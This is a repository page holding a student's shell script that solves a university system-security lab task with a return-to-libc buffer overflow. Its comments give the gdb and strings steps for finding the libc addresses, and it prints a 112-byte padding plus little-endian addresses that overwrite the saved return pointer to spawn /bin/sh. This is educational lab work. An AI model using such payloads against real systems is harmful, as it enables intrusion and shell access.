RubNoobs/Systemsicherheit
3
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
Systemsicherheit/Assignment 6 - Software Security - Teil 2/ret2libc/solution.sh
Sascha Tommasone 55f0505296
All checks were successful
Latex Build / build-latex (Assignment 4 - Protokollsicherheit (Praxis)) (push) Successful in 1m2s
Details
Latex Build / build-latex (Assignment 5 - Software Security - Teil 1) (push) Successful in 1m4s
Details
[Assignment-6] solution task 8 (return-to-libc)
2024-06-14 16:01:04 +02:00

31 lines
1.1 KiB
Bash
Executable file
Raw Blame History

#!/bin/bash
# sources: https://www.ired.team/offensive-security/code-injection-process-injection/binary-exploitation/return-to-libc-ret2libc
##### Exploit Creation Steps #####
###################################
# Step 1: Locate the offset of the string '/bin/sh' in libc
# Command: strings -a -t x /usr/lib32/libc-2.31.so | grep /bin/sh
# ---> 0x18c363
# Step 2: Determine the base address of libc in the ret2libc environment using gdb
# Command: info proc map
# ---> 0xf7dd4000
# Step 3: Find the addresses of 'system' and 'exit' functions using gdb
# Commands:
# p system -> 0xf7e15360
# p exit -> 0xf7e07ec0
###################################
############ Exploit ##############
# Fill the buffer with 'A's until the stored EIP is reached
printf "A%.0s" {1..112}
# Overwrite the stored EIP with the address of 'system' function
# Place the address of 'exit' function as the return address for 'system'
# Provide the argument for 'system' which is the address of the string '/bin/sh' (calculated as base libc + offset)
# All addresses are in little-endian format
printf "\x60\x53\xe1\xf7\xc0\x7e\xe0\xf7\x63\x03\xf6\xf7"
###################################
Reference in a new issue View git blame Copy permalink